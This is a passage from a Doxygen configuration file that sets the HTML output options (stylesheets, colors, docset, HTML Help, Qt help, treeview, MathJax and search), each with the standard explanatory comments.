HTML_FILE_EXTENSION = .html # The HTML_HEADER tag can be used to specify a user-defined HTML header file for # each generated HTML page. If the tag is left blank doxygen will generate a # standard header. # # To get valid HTML the header file that includes any scripts and style sheets # that doxygen needs, which is dependent on the configuration options used (e.g. # the setting GENERATE_TREEVIEW). It is highly recommended to start with a # default header using # doxygen -w html new_header.html new_footer.html new_stylesheet.css # YourConfigFile # and then modify the file new_header.html. See also section "Doxygen usage" # for information on how to generate the default header that doxygen normally # uses. # Note: The header is subject to change so you typically have to regenerate the # default header when upgrading to a newer version of doxygen. For a description # of the possible markers and block names see the documentation. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_HEADER = # The HTML_FOOTER tag can be used to specify a user-defined HTML footer for each # generated HTML page. If the tag is left blank doxygen will generate a standard # footer. See HTML_HEADER for more information on how to generate a default # footer and what special commands can be used inside the footer. See also # section "Doxygen usage" for information on how to generate the default footer # that doxygen normally uses. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_FOOTER = # The HTML_STYLESHEET tag can be used to specify a user-defined cascading style # sheet that is used by each HTML page. It can be used to fine-tune the look of # the HTML output. If left blank doxygen will generate a default style sheet. # See also section "Doxygen usage" for information on how to generate the style # sheet that doxygen normally uses. # Note: It is recommended to use HTML_EXTRA_STYLESHEET instead of this tag, as # it is more robust and this tag (HTML_STYLESHEET) will in the future become # obsolete. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_STYLESHEET = # The HTML_EXTRA_STYLESHEET tag can be used to specify additional user-defined # cascading style sheets that are included after the standard style sheets # created by doxygen. Using this option one can overrule certain style aspects. # This is preferred over using HTML_STYLESHEET since it does not replace the # standard style sheet and is therefor more robust against future updates. # Doxygen will copy the style sheet files to the output directory. # Note: The order of the extra stylesheet files is of importance (e.g. the last # stylesheet in the list overrules the setting of the previous ones in the # list). For an example see the documentation. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_EXTRA_STYLESHEET = # The HTML_EXTRA_FILES tag can be used to specify one or more extra images or # other source files which should be copied to the HTML output directory. Note # that these files will be copied to the base HTML output directory. Use the # $relpath^ marker in the HTML_HEADER and/or HTML_FOOTER files to load these # files. In the HTML_STYLESHEET file, use the file name only. Also note that the # files will be copied as-is; there are no commands or markers available. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_EXTRA_FILES = # The HTML_COLORSTYLE_HUE tag controls the color of the HTML output. Doxygen # will adjust the colors in the stylesheet and background images according to # this color. Hue is specified as an angle on a colorwheel, see # http://en.wikipedia.org/wiki/Hue for more information. For instance the value # 0 represents red, 60 is yellow, 120 is green, 180 is cyan, 240 is blue, 300 # purple, and 360 is red again. # Minimum value: 0, maximum value: 359, default value: 220. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_COLORSTYLE_HUE = 220 # The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of the colors # in the HTML output. For a value of 0 the output will use grayscales only. A # value of 255 will produce the most vivid colors. # Minimum value: 0, maximum value: 255, default value: 100. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_COLORSTYLE_SAT = 100 # The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to the # luminance component of the colors in the HTML output. Values below 100 # gradually make the output lighter, whereas values above 100 make the output # darker. The value divided by 100 is the actual gamma applied, so 80 represents # a gamma of 0.8, The value 220 represents a gamma of 2.2, and 100 does not # change the gamma. # Minimum value: 40, maximum value: 240, default value: 80. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_COLORSTYLE_GAMMA = 80 # If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML # page will contain the date and time when the page was generated. Setting this # to NO can help when comparing the output of multiple runs. # The default value is: YES. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_TIMESTAMP = YES # If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML # documentation will contain sections that can be hidden and shown after the # page has loaded. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_DYNAMIC_SECTIONS = NO # With HTML_INDEX_NUM_ENTRIES one can control the preferred number of entries # shown in the various tree structured indices initially; the user can expand # and collapse entries dynamically later on. Doxygen will expand the tree to # such a level that at most the specified number of entries are visible (unless # a fully collapsed tree already exceeds this amount). So setting the number of # entries 1 will produce a full collapsed tree by default. 0 is a special value # representing an infinite number of entries and will result in a full expanded # tree by default. # Minimum value: 0, maximum value: 9999, default value: 100. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_INDEX_NUM_ENTRIES = 100 # If the GENERATE_DOCSET tag is set to YES, additional index files will be # generated that can be used as input for Apple's Xcode 3 integrated development # environment (see: http://developer.apple.com/tools/xcode/), introduced with # OSX 10.5 (Leopard). To create a documentation set, doxygen will generate a # Makefile in the HTML output directory. Running make will produce the docset in # that directory and running make install will install the docset in # ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find it at # startup. See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html # for more information. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. GENERATE_DOCSET = NO # This tag determines the name of the docset feed. A documentation feed provides # an umbrella under which multiple documentation sets from a single provider # (such as a company or product suite) can be grouped. # The default value is: Doxygen generated docs. # This tag requires that the tag GENERATE_DOCSET is set to YES. DOCSET_FEEDNAME = "Doxygen generated docs" # This tag specifies a string that should uniquely identify the documentation # set bundle. This should be a reverse domain-name style string, e.g. # com.mycompany.MyDocSet. Doxygen will append .docset to the name. # The default value is: org.doxygen.Project. # This tag requires that the tag GENERATE_DOCSET is set to YES. DOCSET_BUNDLE_ID = org.doxygen.Project # The DOCSET_PUBLISHER_ID tag specifies a string that should uniquely identify # the documentation publisher. This should be a reverse domain-name style # string, e.g. com.mycompany.MyDocSet.documentation. # The default value is: org.doxygen.Publisher. # This tag requires that the tag GENERATE_DOCSET is set to YES. DOCSET_PUBLISHER_ID = org.doxygen.Publisher # The DOCSET_PUBLISHER_NAME tag identifies the documentation publisher. # The default value is: Publisher. # This tag requires that the tag GENERATE_DOCSET is set to YES. DOCSET_PUBLISHER_NAME = Publisher # If the GENERATE_HTMLHELP tag is set to YES then doxygen generates three # additional HTML index files: index.hhp, index.hhc, and index.hhk. The # index.hhp is a project file that can be read by Microsoft's HTML Help Workshop # (see: http://www.microsoft.com/en-us/download/details.aspx?id=21138) on # Windows. # # The HTML Help Workshop contains a compiler that can convert all HTML output # generated by doxygen into a single compiled HTML file (.chm). Compiled HTML # files are now used as the Windows 98 help format, and will replace the old # Windows help format (.hlp) on all Windows platforms in the future. Compressed # HTML files also contain an index, a table of contents, and you can search for # words in the documentation. The HTML workshop also contains a viewer for # compressed HTML files. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. GENERATE_HTMLHELP = NO # The CHM_FILE tag can be used to specify the file name of the resulting .chm # file. You can add a path in front of the file if the result should not be # written to the html output directory. # This tag requires that the tag GENERATE_HTMLHELP is set to YES. CHM_FILE = # The HHC_LOCATION tag can be used to specify the location (absolute path # including file name) of the HTML help compiler ( hhc.exe). If non-empty # doxygen will try to run the HTML help compiler on the generated index.hhp. # The file has to be specified with full path. # This tag requires that the tag GENERATE_HTMLHELP is set to YES. HHC_LOCATION = # The GENERATE_CHI flag controls if a separate .chi index file is generated ( # YES) or that it should be included in the master .chm file ( NO). # The default value is: NO. # This tag requires that the tag GENERATE_HTMLHELP is set to YES. GENERATE_CHI = NO # The CHM_INDEX_ENCODING is used to encode HtmlHelp index ( hhk), content ( hhc) # and project file content. # This tag requires that the tag GENERATE_HTMLHELP is set to YES. CHM_INDEX_ENCODING = # The BINARY_TOC flag controls whether a binary table of contents is generated ( # YES) or a normal table of contents ( NO) in the .chm file. Furthermore it # enables the Previous and Next buttons. # The default value is: NO. # This tag requires that the tag GENERATE_HTMLHELP is set to YES. BINARY_TOC = NO # The TOC_EXPAND flag can be set to YES to add extra items for group members to # the table of contents of the HTML help documentation and to the tree view. # The default value is: NO. # This tag requires that the tag GENERATE_HTMLHELP is set to YES. TOC_EXPAND = NO # If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and # QHP_VIRTUAL_FOLDER are set, an additional index file will be generated that # can be used as input for Qt's qhelpgenerator to generate a Qt Compressed Help # (.qch) of the generated HTML documentation. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. GENERATE_QHP = NO # If the QHG_LOCATION tag is specified, the QCH_FILE tag can be used to specify # the file name of the resulting .qch file. The path specified is relative to # the HTML output folder. # This tag requires that the tag GENERATE_QHP is set to YES. QCH_FILE = # The QHP_NAMESPACE tag specifies the namespace to use when generating Qt Help # Project output. For more information please see Qt Help Project / Namespace # (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#namespace). # The default value is: org.doxygen.Project. # This tag requires that the tag GENERATE_QHP is set to YES. QHP_NAMESPACE = org.doxygen.Project # The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating Qt # Help Project output. For more information please see Qt Help Project / Virtual # Folders (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#virtual- # folders). # The default value is: doc. # This tag requires that the tag GENERATE_QHP is set to YES. QHP_VIRTUAL_FOLDER = doc # If the QHP_CUST_FILTER_NAME tag is set, it specifies the name of a custom # filter to add. For more information please see Qt Help Project / Custom # Filters (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#custom- # filters). # This tag requires that the tag GENERATE_QHP is set to YES. QHP_CUST_FILTER_NAME = # The QHP_CUST_FILTER_ATTRS tag specifies the list of the attributes of the # custom filter to add. For more information please see Qt Help Project / Custom # Filters (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#custom- # filters). # This tag requires that the tag GENERATE_QHP is set to YES. QHP_CUST_FILTER_ATTRS = # The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this # project's filter section matches. Qt Help Project / Filter Attributes (see: # http://qt-project.org/doc/qt-4.8/qthelpproject.html#filter-attributes). # This tag requires that the tag GENERATE_QHP is set to YES. QHP_SECT_FILTER_ATTRS = # The QHG_LOCATION tag can be used to specify the location of Qt's # qhelpgenerator. If non-empty doxygen will try to run qhelpgenerator on the # generated .qhp file. # This tag requires that the tag GENERATE_QHP is set to YES. QHG_LOCATION = # If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files will be # generated, together with the HTML files, they form an Eclipse help plugin. To # install this plugin and make it available under the help contents menu in # Eclipse, the contents of the directory containing the HTML and XML files needs # to be copied into the plugins directory of eclipse. The name of the directory # within the plugins directory should be the same as the ECLIPSE_DOC_ID value. # After copying Eclipse needs to be restarted before the help appears. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. GENERATE_ECLIPSEHELP = NO # A unique identifier for the Eclipse help plugin. When installing the plugin # the directory name containing the HTML and XML files should also have this # name. Each documentation set should have its own identifier. # The default value is: org.doxygen.Project. # This tag requires that the tag GENERATE_ECLIPSEHELP is set to YES. ECLIPSE_DOC_ID = org.doxygen.Project # If you want full control over the layout of the generated HTML pages it might # be necessary to disable the index and replace it with your own. The # DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs) at top # of each HTML page. A value of NO enables the index and the value YES disables # it. Since the tabs in the index contain the same information as the navigation # tree, you can set this option to YES if you also set GENERATE_TREEVIEW to YES. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. DISABLE_INDEX = NO # The GENERATE_TREEVIEW tag is used to specify whether a tree-like index # structure should be generated to display hierarchical information. If the tag # value is set to YES, a side panel will be generated containing a tree-like # index structure (just like the one that is generated for HTML Help). For this # to work a browser that supports JavaScript, DHTML, CSS and frames is required # (i.e. any modern browser). Windows users are probably better off using the # HTML help feature. Via custom stylesheets (see HTML_EXTRA_STYLESHEET) one can # further fine-tune the look of the index. As an example, the default style # sheet generated by doxygen has an example that shows how to put an image at # the root of the tree instead of the PROJECT_NAME. Since the tree basically has # the same information as the tab index, you could consider setting # DISABLE_INDEX to YES when enabling this option. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. GENERATE_TREEVIEW = YES # The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values that # doxygen will group on one line in the generated HTML documentation. # # Note that a value of 0 will completely suppress the enum values from appearing # in the overview section. # Minimum value: 0, maximum value: 20, default value: 4. # This tag requires that the tag GENERATE_HTML is set to YES. ENUM_VALUES_PER_LINE = 4 # If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be used # to set the initial width (in pixels) of the frame in which the tree is shown. # Minimum value: 0, maximum value: 1500, default value: 250. # This tag requires that the tag GENERATE_HTML is set to YES. TREEVIEW_WIDTH = 250 # When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open links to # external symbols imported via tag files in a separate window. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. EXT_LINKS_IN_WINDOW = NO # Use this tag to change the font size of LaTeX formulas included as images in # the HTML documentation. When you change the font size after a successful # doxygen run you need to manually remove any form_*.png images from the HTML # output directory to force them to be regenerated. # Minimum value: 8, maximum value: 50, default value: 10. # This tag requires that the tag GENERATE_HTML is set to YES. FORMULA_FONTSIZE = 10 # Use the FORMULA_TRANPARENT tag to determine whether or not the images # generated for formulas are transparent PNGs. Transparent PNGs are not # supported properly for IE 6.0, but are supported on all modern browsers. # # Note that when changing this option you need to delete any form_*.png files in # the HTML output directory before the changes have effect. # The default value is: YES. # This tag requires that the tag GENERATE_HTML is set to YES. FORMULA_TRANSPARENT = YES # Enable the USE_MATHJAX option to render LaTeX formulas using MathJax (see # http://www.mathjax.org) which uses client side Javascript for the rendering # instead of using prerendered bitmaps. Use this if you do not have LaTeX # installed or if you want to formulas look prettier in the HTML output. When # enabled you may also need to install MathJax separately and configure the path # to it using the MATHJAX_RELPATH option. # The default value is: NO. # This tag requires that the tag GENERATE_HTML is set to YES. USE_MATHJAX = NO # When MathJax is enabled you can set the default output format to be used for # the MathJax output. See the MathJax site (see: # http://docs.mathjax.org/en/latest/output.html) for more details. # Possible values are: HTML-CSS (which is slower, but has the best # compatibility), NativeMML (i.e. MathML) and SVG. # The default value is: HTML-CSS. # This tag requires that the tag USE_MATHJAX is set to YES. MATHJAX_FORMAT = HTML-CSS # When MathJax is enabled you need to specify the location relative to the HTML # output directory using the MATHJAX_RELPATH option. The destination directory # should contain the MathJax.js script. For instance, if the mathjax directory # is located at the same level as the HTML output directory, then # MATHJAX_RELPATH should be ../mathjax. The default value points to the MathJax # Content Delivery Network so you can quickly see the result without installing # MathJax. However, it is strongly recommended to install a local copy of # MathJax from http://www.mathjax.org before deployment. # The default value is: http://cdn.mathjax.org/mathjax/latest. # This tag requires that the tag USE_MATHJAX is set to YES. MATHJAX_RELPATH = http://cdn.mathjax.org/mathjax/latest # The MATHJAX_EXTENSIONS tag can be used to specify one or more MathJax # extension names that should be enabled during MathJax rendering. For example # MATHJAX_EXTENSIONS = TeX/AMSmath TeX/AMSsymbols # This tag requires that the tag USE_MATHJAX is set to YES. MATHJAX_EXTENSIONS = # The MATHJAX_CODEFILE tag can be used to specify a file with javascript pieces # of code that will be used on startup of the MathJax code. See the MathJax site # (see: http://docs.mathjax.org/en/latest/output.html) for more details. For an # example see the documentation. # This tag requires that the tag USE_MATHJAX is set to YES. MATHJAX_CODEFILE = # When the SEARCHENGINE tag is enabled doxygen will generate a search box for # the HTML output. The underlying search engine uses javascript and DHTML and # should work on any modern browser. Note that when using HTML help # (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets (GENERATE_DOCSET) # there is already a search function so this one should typically be disabled. # For large projects the javascript based search engine can be slow, then # enabling SERVER_BASED_SEARCH may provide a better solution. It is possible to # search using the keyboard; to jump to the search box use + S # (what the is depends on the OS and browser, but it is typically # , /